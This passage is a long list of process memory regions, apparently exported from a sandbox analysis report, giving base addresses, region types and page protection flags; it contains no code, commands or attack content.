|
|
1CB7000
|
unkown image
|
page readonly
|
|
|
|
3A53000
|
unkown
|
page read and write
|
|
|
|
7FF0011A000
|
unkown
|
page execute and read and write
|
|
|
|
3098000
|
unkown
|
page read and write
|
|
|
|
3715000
|
unkown
|
page read and write
|
|
|
|
2FF5000
|
unkown
|
page read and write
|
|
|
|
7FFFFF00000
|
unkown
|
page execute and read and write
|
|
|
|
32A1000
|
unkown
|
page read and write
|
|
|
|
15F000
|
unkown
|
page read and write
|
|
|
|
321E000
|
unkown
|
page read and write
|
|
|
|
27A0000
|
unkown
|
page read and write
|
|
|
|
514000
|
heap private
|
page read and write
|
|
|
|
313A000
|
unkown
|
page read and write
|
|
|
|
1B740000
|
unkown
|
page read and write
|
|
|
|
27A0000
|
unkown
|
page read and write
|
|
|
|
7FFFFFC0000
|
unkown image
|
page readonly
|
|
|
|
3AC0000
|
unkown
|
page read and write
|
|
|
|
2180000
|
heap private
|
page read and write
|
|
|
|
27A0000
|
unkown
|
page read and write
|
|
|
|
7FF00112000
|
unkown
|
page execute and read and write
|
|
|
|
36F000
|
heap default
|
page read and write
|
|
|
|
27A0000
|
unkown
|
page read and write
|
|
|
|
1FD0000
|
heap private
|
page read and write
|
|
|
|
1B70000
|
unkown image
|
page readonly
|
|
|
|
2250000
|
unkown
|
page read and write
|
|
|
|
30000
|
unkown image
|
page readonly
|
|
|
|
7FFFFFC0000
|
unkown image
|
page readonly
|
|
|
|
30E000
|
heap default
|
page read and write
|
|
|
|
1F0B000
|
heap private
|
page read and write
|
|
|
|
3B39000
|
unkown
|
page read and write
|
|
|
|
1C80000
|
heap private
|
page read and write
|
|
|
|
1DA0000
|
unkown image
|
page readonly
|
|
|
|
7FFFFFD0000
|
unkown image
|
page readonly
|
|
|
|
2B50000
|
unkown image
|
page read and write
|
|
|
|
385A000
|
unkown
|
page read and write
|
|
|
|
7FFFFFB2000
|
unkown image
|
page readonly
|
|
|
|
2159000
|
heap private
|
page read and write
|
|
|
|
311B000
|
unkown
|
page read and write
|
|
|
|
2C35000
|
heap private
|
page read and write
|
|
|
|
3609000
|
unkown
|
page read and write
|
|
|
|
7FFFFFC2000
|
unkown image
|
page readonly
|
|
|
|
2340000
|
unkown image
|
page readonly
|
|
|
|
7FF00270000
|
unkown
|
page execute and read and write
|
|
|
|
39F4000
|
unkown
|
page read and write
|
|
|
|
7FFFFFC2000
|
unkown image
|
page readonly
|
|
|
|
1FD0000
|
heap private
|
page read and write
|
|
|
|
30C9000
|
unkown
|
page read and write
|
|
|
|
10000
|
unkown image
|
page read and write
|
|
|
|
3AC3000
|
unkown
|
page read and write
|
|
|
|
7FFFFFC0000
|
unkown image
|
page readonly
|
|
|
|
2FBC000
|
unkown
|
page read and write
|
|
|
|
27A0000
|
unkown
|
page read and write
|
|
|
|
2B20000
|
unkown
|
page read and write
|
|
|
|
34B6000
|
unkown
|
page read and write
|
|
|
|
3A32000
|
unkown
|
page read and write
|
|
|
|
6B0000
|
unkown image
|
page readonly
|
|
|
|
2250000
|
unkown
|
page read and write
|
|
|
|
7FFFFFB2000
|
unkown image
|
page readonly
|
|
|
|
2AB0000
|
heap private
|
page execute and read and write
|
|
|
|
379000
|
heap default
|
page read and write
|
|
|
|
169000
|
unkown
|
page read and write
|
|
|
|
2FB000
|
unkown
|
page read and write
|
|
|
|
3CC0000
|
unkown
|
page read and write
|
|
|
|
2119000
|
heap private
|
page read and write
|
|
|
|
2A40000
|
unkown
|
page read and write
|
|
|
|
2B10000
|
unkown image
|
page readonly
|
|
|
|
7FFFFFB0000
|
unkown image
|
page readonly
|
|
|
|
3075000
|
unkown
|
page read and write
|
|
|
|
2250000
|
unkown
|
page read and write
|
|
|
|
3999000
|
unkown
|
page read and write
|
|
|
|
2FB0000
|
unkown
|
page read and write
|
|
|
|
315A000
|
unkown
|
page read and write
|
|
|
|
7FF0001A000
|
unkown
|
page execute and read and write
|
|
|
|
2B00000
|
unkown
|
page read and write
|
|
|
|
22C0000
|
unkown image
|
page readonly
|
|
|
|
155000
|
unkown
|
page read and write | page guard
|
|
|
|
3A20000
|
unkown
|
page read and write
|
|
|
|
1B7000
|
heap default
|
page read and write
|
|
|
|
7EFE0000
|
unkown image
|
page readonly
|
|
|
|
11D000
|
unkown
|
page read and write
|
|
|
|
3552000
|
unkown
|
page read and write
|
|
|
|
3A23000
|
unkown
|
page read and write
|
|
|
|
1B7AC000
|
unkown
|
page read and write
|
|
|
|
200000
|
heap default
|
page read and write
|
|
|
|
7FFFFFC0000
|
unkown image
|
page readonly
|
|
|
|
1B616000
|
unkown
|
page read and write
|
|
|
|
1B54D000
|
unkown
|
page read and write
|
|
|
|
2FC9000
|
unkown
|
page read and write
|
|
|
|
2FDB000
|
unkown
|
page read and write
|
|
|
|
3A0E000
|
unkown
|
page read and write
|
|
|
|
7FFFFFC0000
|
unkown image
|
page readonly
|
|
|
|
7FFFFFD0000
|
unkown image
|
page readonly
|
|
|
|
13032000
|
unkown
|
page read and write
|
|
|
|
39B8000
|
unkown
|
page read and write
|
|
|
|
2250000
|
unkown
|
page read and write
|
|
|
|
7FF001F0000
|
unkown
|
page read and write
|
|
|
|
3BC000
|
heap default
|
page read and write
|
|
|
|
367D000
|
unkown
|
page read and write
|
|
|
|
3B15000
|
unkown
|
page read and write
|
|
|
|
23E000
|
heap default
|
page read and write
|
|
|
|
2BF0000
|
unkown
|
page read and write
|
|
|
|
300E000
|
unkown
|
page read and write
|
|
|
|
3AF3000
|
unkown
|
page read and write
|
|
|
|
1CB70000
|
heap private
|
page read and write
|
|
|
|
7FF00260000
|
unkown
|
page read and write
|
|
|
|
3B04000
|
unkown
|
page read and write
|
|
|
|
1C84000
|
heap private
|
page read and write
|
|
|
|
7FF0004A000
|
unkown
|
page execute and read and write
|
|
|
|
35ED000
|
unkown
|
page read and write
|
|
|
|
2305000
|
heap private
|
page read and write
|
|
|
|
2250000
|
unkown
|
page read and write
|
|
|
|
1B80000
|
unkown image
|
page readonly
|
|
|
|
368D000
|
unkown
|
page read and write
|
|
|
|
3619000
|
unkown
|
page read and write
|
|
|
|
20000
|
heap private
|
page read and write
|
|
|
|
7FF001E0000
|
unkown
|
page read and write
|
|
|
|
145000
|
unkown
|
page read and write
|
|
|
|
7FFFFFB0000
|
unkown image
|
page readonly
|
|
|
|
2A36000
|
unkown
|
page read and write
|
|
|
|
23E5000
|
heap private
|
page read and write
|
|
|
|
2400000
|
unkown image
|
page readonly
|
|
|
|
2250000
|
unkown
|
page read and write
|
|
|
|
1AD40000
|
unkown
|
page read and write
|
|
|
|
30E000
|
heap default
|
page read and write
|
|
|
|
20000
|
unkown image
|
page read and write
|
|
|
|
7FFFFFB0000
|
unkown image
|
page readonly
|
|
|
|
38D7000
|
unkown
|
page read and write
|
|
|
|
23E9000
|
heap private
|
page read and write
|
|
|
|
2FFE000
|
unkown
|
page read and write
|
|
|
|
700000
|
unkown image
|
page readonly
|
|
|
|
1C8CE000
|
unkown
|
page read and write
|
|
|
|
2E6000
|
unkown
|
page read and write
|
|
|
|
1B5DB000
|
unkown
|
page read and write
|
|
|
|
60000
|
unkown image
|
page read and write
|
|
|
|
2F4B000
|
unkown
|
page read and write
|
|
|
|
7FFFFFB0000
|
unkown image
|
page readonly
|
|
|
|
12E91000
|
unkown
|
page read and write
|
|
|
|
1B9A0000
|
unkown
|
page read and write
|
|
|
|
3003000
|
unkown
|
page read and write
|
|
|
|
1B62B000
|
unkown
|
page read and write
|
|
|
|
283D000
|
unkown
|
page read and write
|
|
|
|
2250000
|
unkown
|
page read and write
|
|
|
|
7FFFFFB0000
|
unkown image
|
page readonly
|
|
|
|
12E51000
|
unkown
|
page read and write
|
|
|
|
2250000
|
unkown
|
page read and write
|
|
|
|
2B15000
|
unkown
|
page read and write
|
|
|
|
2FEE000
|
unkown
|
page read and write
|
|
|
|
207000
|
heap default
|
page read and write
|
|
|
|
2CE1000
|
unkown
|
page read and write
|
|
|
|
2C30000
|
heap private
|
page read and write
|
|
|
|
2BF0000
|
unkown
|
page read and write
|
|
|
|
30A7000
|
unkown
|
page read and write
|
|
|
|
2DB8000
|
unkown
|
page read and write
|
|
|
|
304D000
|
unkown
|
page read and write
|
|
|
|
7FF000E0000
|
unkown
|
page read and write
|
|
|
|
C0000
|
unkown image
|
page readonly
|
|
|
|
DA000
|
unkown
|
page read and write
|
|
|
|
319D000
|
unkown
|
page read and write
|
|
|
|
24000
|
heap private
|
page read and write
|
|
|
|
3115000
|
unkown
|
page read and write
|
|
|
|
2250000
|
unkown
|
page read and write
|
|
|
|
580000
|
unkown image
|
page readonly
|
|
|
|
2FEF000
|
unkown
|
page read and write
|
|
|
|
E0000
|
unkown image
|
page read and write
|
|
|
|
21A5000
|
heap private
|
page read and write
|
|
|
|
10000
|
unkown image
|
page read and write
|
|
|
|
310F000
|
unkown
|
page read and write
|
|
|
|
1BC70000
|
heap private
|
page read and write
|
|
|
|
1E27000
|
unkown image
|
page readonly
|
|
|
|
1BA00000
|
unkown
|
page read and write
|
|
|
|
35F2000
|
unkown
|
page read and write
|
|
|
|
27A0000
|
unkown
|
page read and write
|
|
|
|
32BE000
|
unkown
|
page read and write
|
|
|
|
7FF00220000
|
unkown
|
page read and write
|
|
|
|
7FF00230000
|
unkown
|
page execute and read and write
|
|
|
|
2CDF000
|
unkown
|
page read and write
|
|
|
|
7EFE0000
|
unkown image
|
page readonly
|
|
|
|
27A0000
|
unkown
|
page read and write
|
|
|
|
396E000
|
unkown
|
page read and write
|
|
|
|
474000
|
heap private
|
page read and write
|
|
|
|
520000
|
unkown image
|
page readonly
|
|
|
|
7FF000D0000
|
unkown
|
page read and write
|
|
|
|
15B000
|
unkown
|
page read and write
|
|
|
|
7FF00210000
|
unkown
|
page read and write
|
|
|
|
30000
|
unkown image
|
page readonly
|
|
|
|
7FF00012000
|
unkown
|
page execute and read and write
|
|
|
|
3288000
|
unkown
|
page read and write
|
|
|
|
7FFFFFC2000
|
unkown image
|
page readonly
|
|
|
|
7FF00115000
|
unkown
|
page read and write
|
|
|
|
7FFFFFB2000
|
unkown image
|
page readonly
|
|
|
|
35F6000
|
unkown
|
page read and write
|
|
|
|
5E0000
|
unkown image
|
page readonly
|
|
|
|
27A0000
|
unkown
|
page read and write
|
|
|
|
3A94000
|
unkown
|
page read and write
|
|
|
|
3A57000
|
unkown
|
page read and write
|
|
|
|
3A91000
|
unkown
|
page read and write
|
|
|
|
2F29000
|
unkown
|
page read and write
|
|
|
|
324A000
|
unkown
|
page read and write
|
|
|
|
7FFFFFD0000
|
unkown image
|
page readonly
|
|
|
|
2FCF000
|
unkown
|
page read and write
|
|
|
|
3AED000
|
unkown
|
page read and write
|
|
|
|
360C000
|
unkown
|
page read and write
|
|
|
|
309E000
|
unkown
|
page read and write
|
|
|
|
3A1D000
|
unkown
|
page read and write
|
|
|
|
1B50000
|
unkown
|
page read and write
|
|
|
|
3726000
|
unkown
|
page read and write
|
|
|
|
32C1000
|
unkown
|
page read and write
|
|
|
|
7FFFFF00000
|
unkown
|
page execute and read and write
|
|
|
|
3A76000
|
unkown
|
page read and write
|
|
|
|
30E7000
|
unkown
|
page read and write
|
|
|
|
1B770000
|
unkown
|
page read and write
|
|
|
|
1C7BE000
|
unkown
|
page read and write
|
|
|
|
395C000
|
unkown
|
page read and write
|
|
|
|
308E000
|
unkown
|
page read and write
|
|
|
|
2250000
|
unkown
|
page read and write
|
|
|
|
169000
|
unkown
|
page read and write
|
|
|
|
2A44000
|
unkown
|
page read and write
|
|
|
|
2F0C000
|
unkown
|
page read and write
|
|
|
|
2FC2000
|
unkown
|
page read and write
|
|
|
|
165000
|
unkown
|
page read and write
|
|
|
|
398C000
|
unkown
|
page read and write
|
|
|
|
32BB000
|
unkown
|
page read and write
|
|
|
|
F2000
|
unkown
|
page read and write
|
|
|
|
7FFFFFD0000
|
unkown image
|
page readonly
|
|
|
|
3179000
|
unkown
|
page read and write
|
|
|
|
3030000
|
unkown
|
page read and write
|
|
|
|
7FFFFFC0000
|
unkown image
|
page readonly
|
|
|
|
3A82000
|
unkown
|
page read and write
|
|
|
|
7EFE0000
|
unkown image
|
page readonly
|
|
|
|
39B5000
|
unkown
|
page read and write
|
|
|
|
7FF00020000
|
unkown
|
page read and write
|
|
|
|
22E7000
|
heap private
|
page read and write
|
|
|
|
3603000
|
unkown
|
page read and write
|
|
|
|
3AFA000
|
unkown
|
page read and write
|
|
|
|
2FAD000
|
unkown
|
page read and write
|
|
|
|
1B0000
|
unkown
|
page read and write
|
|
|
|
1F60000
|
unkown image
|
page readonly
|
|
|
|
2CDE000
|
unkown
|
page read and write | page guard
|
|
|
|
3861000
|
unkown
|
page read and write
|
|
|
|
1F05000
|
heap private
|
page read and write
|
|
|
|
2270000
|
unkown
|
page read and write
|
|
|
|
35F0000
|
unkown
|
page read and write
|
|
|
|
7FF00110000
|
unkown
|
page read and write
|
|
|
|
2D2B000
|
heap private
|
page read and write
|
|
|
|
3A09000
|
unkown
|
page read and write
|
|
|
|
20000
|
unkown image
|
page read and write
|
|
|
|
3054000
|
unkown
|
page read and write
|
|
|
|
2FA9000
|
unkown
|
page read and write
|
|
|
|
3AB0000
|
unkown
|
page read and write
|
|
|
|
100000
|
unkown image
|
page readonly
|
|
|
|
7FFFFFB2000
|
unkown image
|
page readonly
|
|
|
|
30A3000
|
unkown
|
page read and write
|
|
|
|
1D0000
|
unkown
|
page read and write
|
|
|
|
3416000
|
unkown
|
page read and write
|
|
|
|
3118000
|
unkown
|
page read and write
|
|
|
|
660000
|
unkown image
|
page readonly
|
|
|
|
3A20000
|
unkown
|
page read and write
|
|
|
|
27F0000
|
unkown image
|
page readonly
|
|
|
|
35CA000
|
unkown
|
page read and write
|
|
|
|
368A000
|
unkown
|
page read and write
|
|
|
|
10000
|
unkown image
|
page read and write
|
|
|
|
2C6B000
|
heap private
|
page read and write
|
|
|
|
7FF000EA000
|
unkown
|
page execute and read and write
|
|
|
|
3D0000
|
unkown image
|
page readonly
|
|
|
|
279D000
|
unkown
|
page read and write
|
|
|
|
2CE000
|
heap default
|
page read and write
|
|
|
|
362F000
|
unkown
|
page read and write
|
|
|
|
140000
|
heap default
|
page read and write
|
|
|
|
23E0000
|
heap private
|
page read and write
|
|
|
|
357E000
|
unkown
|
page read and write
|
|
|
|
3696000
|
unkown
|
page read and write
|
|
|
|
1CA0000
|
unkown image
|
page readonly
|
|
|
|
3328000
|
unkown
|
page read and write
|
|
|
|
7FF00290000
|
unkown
|
page read and write
|
|
|
|
3AE9000
|
unkown
|
page read and write
|
|
|
|
1B44000
|
heap private
|
page read and write
|
|
|
|
7FF0002C000
|
unkown
|
page execute and read and write
|
|
|
|
7FFFFFB0000
|
unkown image
|
page readonly
|
|
|
|
7FFFFFC0000
|
unkown image
|
page readonly
|
|
|
|
DF000
|
unkown
|
page read and write
|
|
|
|
1A0000
|
heap private
|
page read and write
|
|
|
|
145000
|
unkown
|
page read and write
|
|
|
|
1BBC3000
|
heap private
|
page read and write
|
|
|
|
7FFFFFD0000
|
unkown image
|
page readonly
|
|
|
|
321B000
|
unkown
|
page read and write
|
|
|
|
39A8000
|
unkown
|
page read and write
|
|
|
|
2B9A000
|
heap private
|
page execute and read and write
|
|
|
|
1B81B000
|
unkown
|
page read and write
|
|
|
|
36AF000
|
unkown
|
page read and write
|
|
|
|
1DF0000
|
unkown
|
page read and write
|
|
|
|
22BF000
|
unkown
|
page read and write
|
|
|
|
1AF0000
|
unkown image
|
page readonly
|
|
|
|
2FBE000
|
unkown
|
page read and write
|
|
|
|
2C10000
|
heap private
|
page read and write
|
|
|
|
180000
|
unkown
|
page read and write
|
|
|
|
304D000
|
unkown
|
page read and write
|
|
|
|
3C7000
|
heap default
|
page read and write
|
|
|
|
70000
|
unkown
|
page read and write
|
|
|
|
23FD000
|
unkown
|
page read and write
|
|
|
|
3B0B000
|
unkown
|
page read and write
|
|
|
|
3CC0000
|
unkown
|
page read and write
|
|
|
|
7FFFFFB0000
|
unkown image
|
page readonly
|
|
|
|
3667000
|
unkown
|
page read and write
|
|
|
|
550000
|
unkown image
|
page readonly
|
|
|
|
416000
|
unkown
|
page read and write
|
|
|
|
7FFFFFB0000
|
unkown image
|
page readonly
|
|
|
|
2050000
|
unkown image
|
page readonly
|
|
|
|
710000
|
unkown image
|
page readonly
|
|
|
|
3A64000
|
unkown
|
page read and write
|
|
|
|
2F10000
|
unkown
|
page read and write
|
|
|
|
307B000
|
unkown
|
page read and write
|
|
|
|
7FF00280000
|
unkown
|
page execute and read and write
|
|
|
|
7FFFFFC2000
|
unkown image
|
page readonly
|
|
|
|
1D67000
|
unkown image
|
page readonly
|
|
|
|
2DDF000
|
unkown
|
page read and write
|
|
|
|
7FFFFFB2000
|
unkown image
|
page readonly
|
|
|
|
2D3F000
|
unkown
|
page read and write
|
|
|
|
1C59E000
|
unkown
|
page read and write
|
|
|
|
1CA6D000
|
unkown
|
page read and write
|
|
|
|
169000
|
unkown
|
page read and write
|
|
|
|
3AE5000
|
unkown
|
page read and write
|
|
|
|
27A0000
|
unkown
|
page read and write
|
|
|
|
22E4000
|
heap private
|
page read and write
|
|
|
|
1B629000
|
unkown
|
page read and write
|
|
|
|
7FF001B0000
|
unkown
|
page execute and read and write
|
|
|
|
2D0000
|
heap default
|
page read and write
|
|
|
|
206000
|
unkown
|
page read and write
|
|
|
|
35F3000
|
unkown
|
page read and write
|
|
|
|
2250000
|
heap private
|
page read and write
|
|
|
|
1CAFE000
|
unkown
|
page read and write
|
|
|
|
1ED0000
|
heap private
|
page read and write
|
|
|
|
2B10000
|
unkown
|
page read and write
|
|
|
|
3A97000
|
unkown
|
page read and write
|
|
|
|
3029000
|
unkown
|
page read and write
|
|
|
|
7FFFFFB2000
|
unkown image
|
page readonly
|
|
|
|
7FFFFFC0000
|
unkown image
|
page readonly
|
|
|
|
7FFFFFD0000
|
unkown image
|
page readonly
|
|
|
|
1B785000
|
unkown
|
page read and write
|
|
|
|
BB000
|
unkown
|
page read and write
|
|
|
|
2250000
|
unkown
|
page read and write
|
|
|
|
40000
|
unkown image
|
page readonly
|
|
|
|
2C15000
|
heap private
|
page read and write
|
|
|
|
1B5F4000
|
unkown
|
page read and write
|
|
|
|
7FF001D0000
|
unkown
|
page execute and read and write
|
|
|
|
510000
|
heap private
|
page read and write
|
|
|
|
2700000
|
unkown image
|
page readonly
|
|
|
|
2A70000
|
heap private
|
page execute and read and write
|
|
|
|
7FF002A0000
|
unkown
|
page execute and read and write
|
|
|
|
1ADE0000
|
unkown
|
page read and write
|
|
|
|
2E6000
|
unkown
|
page read and write
|
|
|
|
2A1F000
|
unkown
|
page read and write
|
|
|
|
12CE1000
|
unkown
|
page read and write
|
|
|
|
14A000
|
unkown
|
page read and write
|
|
|
|
30000
|
unkown image
|
page readonly
|
|
|
|
1C00000
|
unkown image
|
page readonly
|
|
|
|
7FFFFFC0000
|
unkown image
|
page readonly
|
|
|
|
110000
|
unkown image
|
page readonly
|
|
|
|
20B0000
|
heap private
|
page read and write
|
|
|
|
35CD000
|
unkown
|
page read and write
|
|
|
|
7FF001C0000
|
unkown
|
page execute and read and write
|
|
|
|
390000
|
unkown image
|
page readonly
|
|
|
|
39BB000
|
unkown
|
page read and write
|
|
|
|
454E000
|
unkown
|
page read and write
|
|
|
|
2250000
|
unkown
|
page read and write
|
|
|
|
12D85000
|
unkown
|
page read and write
|
|
|
|
3E0000
|
unkown
|
page read and write
|
|
|
|
7FF00142000
|
unkown
|
page execute and read and write
|
|
|
|
169000
|
unkown
|
page read and write
|
|
|
|
7FF00200000
|
unkown
|
page execute and read and write
|
|
|
|
2080000
|
unkown image
|
page readonly
|
|
|
|
2155000
|
heap private
|
page read and write
|
|
|
|
2CF0000
|
heap private
|
page read and write
|
|
|
|
325A000
|
unkown
|
page read and write
|
|
|
|
1AD0000
|
unkown image
|
page readonly
|
|
|
|
30000
|
unkown image
|
page readonly
|
|
|
|
2A2D000
|
unkown
|
page read and write
|
|
|
|
40000
|
unkown image
|
page readonly
|
|
|
|
2250000
|
unkown
|
page read and write
|
|
|
|
35E0000
|
unkown
|
page read and write
|
|
|
|
10000
|
unkown image
|
page read and write
|
|
|
|
7FFFFFD0000
|
unkown image
|
page readonly
|
|
|
|
70000
|
unkown
|
page read and write
|
|
|
|
367A000
|
unkown
|
page read and write
|
|
|
|
13F000
|
unkown
|
page read and write
|
|
|
|
27A0000
|
unkown
|
page read and write
|
|
|
|
307B000
|
unkown
|
page read and write
|
|
|
|
3E60000
|
heap private
|
page read and write
|
|
|
|
3CC0000
|
unkown
|
page read and write
|
|
|
|
F0000
|
unkown
|
page read and write
|
|
|
|
10000
|
unkown image
|
page read and write
|
|
|
|
2250000
|
unkown
|
page read and write
|
|
|
|
39FC000
|
unkown
|
page read and write
|
|
|
|
308B000
|
unkown
|
page read and write
|
|
|
|
440000
|
heap private
|
page read and write
|
|
|
|
5E0000
|
unkown image
|
page readonly
|
|
|
|
27A0000
|
unkown
|
page read and write
|
|
|
|
3D4000
|
heap private
|
page read and write
|
|
|
|
7FF001A0000
|
unkown
|
page execute and read and write
|
|
|
|
530000
|
unkown image
|
page readonly
|
|
|
|
2F68000
|
unkown
|
page read and write
|
|
|
|
E0000
|
unkown
|
page read and write
|
|
|
|
7FF000D2000
|
unkown
|
page execute and read and write
|
|
|
|
305B000
|
unkown
|
page read and write
|
|
|
|
1B9F0000
|
heap private
|
page read and write
|
|
|
|
3214000
|
unkown
|
page read and write
|
|
|
|
40000
|
unkown image
|
page readonly
|
|
|
|
27A0000
|
unkown
|
page read and write
|
|
|
|
39E000
|
heap default
|
page read and write
|
|
|
|
7EFE0000
|
unkown image
|
page readonly
|
|
|
|
10B000
|
unkown
|
page read and write
|
|
|
|
3960000
|
unkown
|
page read and write
|
|
|
|
7FFFFFD0000
|
unkown image
|
page readonly
|
|
|
|
7FFFFF10000
|
unkown
|
page execute and read and write
|
|
|
|
291E000
|
unkown
|
page read and write
|
|
|
|
3A2F000
|
unkown
|
page read and write
|
|
|
|
1C850000
|
heap private
|
page read and write
|
|
|
|
140000
|
unkown image
|
page readonly
|
|
|
|
2B90000
|
heap private
|
page execute and read and write
|
|
|
|
E7000
|
unkown
|
page read and write
|
|
|
|
305E000
|
unkown
|
page read and write
|
|
|
|
3A93000
|
unkown
|
page read and write
|
|
|
|
3A6D000
|
unkown
|
page read and write
|
|
|
|
2250000
|
unkown
|
page read and write
|
|
|
|
1B600000
|
unkown
|
page read and write
|
|
|
|
2920000
|
unkown
|
page read and write
|
|
|
|
36AC000
|
unkown
|
page read and write
|
|
|
|
27A0000
|
unkown
|
page read and write
|
|
|
|
1CC6000
|
unkown
|
page read and write
|
|
|
|
3A48000
|
unkown
|
page read and write
|
|
|
|
12FD0000
|
unkown
|
page read and write
|
|
|
|
17E000
|
heap default
|
page read and write
|
|
|
|
2200000
|
unkown
|
page read and write
|
|
|
|
2250000
|
unkown
|
page read and write
|
|
|
|
1B800000
|
unkown
|
page read and write
|
|
|
|
7FFFFFC2000
|
unkown image
|
page readonly
|
|
|
|
7FFFFFC2000
|
unkown image
|
page readonly
|
|
|
|
1B86000
|
unkown
|
page read and write
|
|
|
|
7FFFFFB0000
|
unkown image
|
page readonly
|
|
|
|
1ED5000
|
heap private
|
page read and write
|
|
|
|
7FF001E7000
|
unkown
|
page read and write
|
|
|
|
30000
|
unkown image
|
page readonly
|
|
|
|
2F2F000
|
unkown
|
page read and write
|
|
|
|
20000
|
unkown image
|
page read and write
|
|
|
|
2250000
|
unkown
|
page read and write
|
|
|
|
7FF00022000
|
unkown
|
page execute and read and write
|
|
|
|
100000
|
unkown
|
page read and write
|
|
|
|
11D000
|
unkown
|
page read and write
|
|
|
|
3288000
|
unkown
|
page read and write
|
|
|
|
2A35000
|
unkown
|
page read and write
|
|
|
|
27A0000
|
unkown
|
page read and write
|
|
|
|
2250000
|
unkown
|
page read and write
|
|
|
|
7FF00170000
|
unkown
|
page execute and read and write
|
|
|
|
7FFFFFB2000
|
unkown image
|
page readonly
|
|
|
|
2D7000
|
heap default
|
page read and write
|
|
|
|
7FFFFFC2000
|
unkown image
|
page readonly
|
|
|
|
1B0000
|
heap default
|
page read and write
|
|
|
|
21DB000
|
heap private
|
page read and write
|
|
|
|
1E6000
|
unkown
|
page read and write
|
|
|
|
2250000
|
unkown
|
page read and write
|
|
|
|
1C9DD000
|
unkown
|
page read and write
|
|
|
|
301C000
|
unkown
|
page read and write
|
|
|
|
3A13000
|
unkown
|
page read and write
|
|
|
|
27A0000
|
unkown
|
page read and write
|
|
|
|
2FC2000
|
unkown
|
page read and write
|
|
|
|
2C4B000
|
heap private
|
page read and write
|
|
|
|
450000
|
heap private
|
page read and write
|
|
|
|
7FFFFFC0000
|
unkown image
|
page readonly
|
|
|
|
1E00000
|
unkown
|
page read and write
|
|
|
|
3201000
|
unkown
|
page read and write
|
|
|
|
2AF0000
|
unkown
|
page read and write
|
|
|
|
7FF00240000
|
unkown
|
page read and write
|
|
|
|
90000
|
heap default
|
page read and write
|
|
|
|
7FFFFFD0000
|
unkown image
|
page readonly
|
|
|
|
3F0000
|
heap private
|
page read and write
|
|
|
|
7FF00190000
|
unkown
|
page execute and read and write
|
|
|
|
3680000
|
unkown
|
page read and write
|
|
|
|
233B000
|
heap private
|
page read and write
|
|
|
|
3E9000
|
heap default
|
page read and write
|
|
|
|
119000
|
unkown
|
page read and write
|
|
|
|
3837000
|
unkown
|
page read and write
|
|
|
|
156000
|
unkown
|
page read and write
|
|
|
|
11D000
|
unkown
|
page read and write
|
|
|
|
7EFE0000
|
unkown image
|
page readonly
|
|
|
|
20000
|
unkown image
|
page readonly
|
|
|
|
2160000
|
heap private
|
page read and write
|
|
|
|
7FF00180000
|
unkown
|
page read and write
|
|
|
|
3062000
|
unkown
|
page read and write
|
|
|
|
2800000
|
unkown
|
page read and write
|
|
|
|
2FEB000
|
unkown
|
page read and write
|
|
|
|
1B60B000
|
unkown
|
page read and write
|
|
|
|
7FFFFFC0000
|
unkown image
|
page readonly
|
|
|
|
32A3000
|
unkown
|
page read and write
|
|
|
|
7FF00100000
|
unkown
|
page read and write
|
|
|
|
3E64000
|
heap private
|
page read and write
|
|
|
|
7FF00250000
|
unkown
|
page execute and read and write
|
|
|
|
2250000
|
unkown
|
page read and write
|
|
|
|
1B9A0000
|
unkown
|
page read and write
|
|
|
|
12F92000
|
unkown
|
page read and write
|
|
|
|
1B3B0000
|
unkown
|
page read and write
|
|
|
|
308F000
|
unkown
|
page read and write
|
|
|
|
1E87000
|
unkown image
|
page readonly
|
|
|
|
2B0000
|
unkown
|
page read and write
|
|
|
|
3025000
|
unkown
|
page read and write
|
|
|
|
7FFFFFC2000
|
unkown image
|
page readonly
|
|
|
|
D0000
|
unkown image
|
page read and write
|
|
|
|
27A0000
|
unkown
|
page read and write
|
|
|
|
2FB5000
|
unkown
|
page read and write
|
|
|
|
7FF00050000
|
unkown
|
page read and write
|
|
|
|
2030000
|
heap private
|
page read and write
|
|
|
|
30B8000
|
unkown
|
page read and write
|
|
|
|
7FFFFFB0000
|
unkown image
|
page readonly
|
|
|
|
2F5000
|
unkown
|
page read and write
|
|
|
|
2A30000
|
unkown
|
page read and write
|
|
|
|
323D000
|
unkown
|
page read and write
|
|
|
|
15B000
|
unkown
|
page read and write
|
|
|
|
40000
|
unkown image
|
page readonly
|
|
|
|
31BA000
|
unkown
|
page read and write
|
|
|
|
12DF1000
|
unkown
|
page read and write
|
|
|
|
7FFFFFC0000
|
unkown image
|
page readonly
|
|
|
|
2169000
|
heap private
|
page read and write
|
|
|
|
12CE5000
|
unkown
|
page read and write
|
|
|
|
347000
|
heap private
|
page read and write
|
|
|
|
2F22000
|
unkown
|
page read and write
|
|
|
|
2FF8000
|
unkown
|
page read and write
|
|
|
|
2FAC000
|
unkown
|
page read and write
|
|
|
|
300000
|
unkown
|
page read and write
|
|
|
|
35E3000
|
unkown
|
page read and write
|
|
|
|
2F2C000
|
unkown
|
page read and write
|
|
|
|
216000
|
unkown
|
page read and write
|
|
|
|
336000
|
unkown
|
page read and write
|
|
|
|
3AAD000
|
unkown
|
page read and write
|
|
|
|
39CD000
|
unkown
|
page read and write
|
|
|
|
30BC000
|
unkown
|
page read and write
|
|
|
|
3A3E000
|
unkown
|
page read and write
|
|
|
|
1C72E000
|
unkown
|
page read and write
|
|
|
|
366A000
|
unkown
|
page read and write
|
|
|
|
27A0000
|
unkown
|
page read and write
|
|
|
|
1C90000
|
unkown
|
page read and write
|
|
|
|
3A35000
|
unkown
|
page read and write
|
|
|
|
CE000
|
heap default
|
page read and write
|
|
|
|
5D0000
|
unkown image
|
page readonly
|
|
|
|
2115000
|
heap private
|
page read and write
|
|
|
|
3A29000
|
unkown
|
page read and write
|
|
|
|
39EE000
|
unkown
|
page read and write
|
|
|
|
4B6000
|
unkown
|
page read and write
|
|
|
|
2BD0000
|
heap private
|
page execute and read and write
|
|
|
|
7FFFFFB0000
|
unkown image
|
page readonly
|
|
|
|
311E000
|
unkown
|
page read and write
|
|
|
|
3A45000
|
unkown
|
page read and write
|
|
|
|
361C000
|
unkown
|
page read and write
|
|
|
|
12EF1000
|
unkown
|
page read and write
|
|
|
|
279F000
|
unkown
|
page read and write
|
|
|
|
10000
|
unkown image
|
page read and write
|
|
|
|
1D5000
|
unkown
|
page read and write | page guard
|
|
|
|
3007000
|
unkown
|
page read and write
|
|
|
|
600000
|
unkown image
|
page readonly
|
|
|
|
27A0000
|
unkown
|
page read and write
|
|
|
|
366D000
|
unkown
|
page read and write
|
|
|
|
3986000
|
unkown
|
page read and write
|
|
|
|
32B4000
|
unkown
|
page read and write
|
|
|
|
3A49000
|
unkown
|
page read and write
|
|
|
|
368000
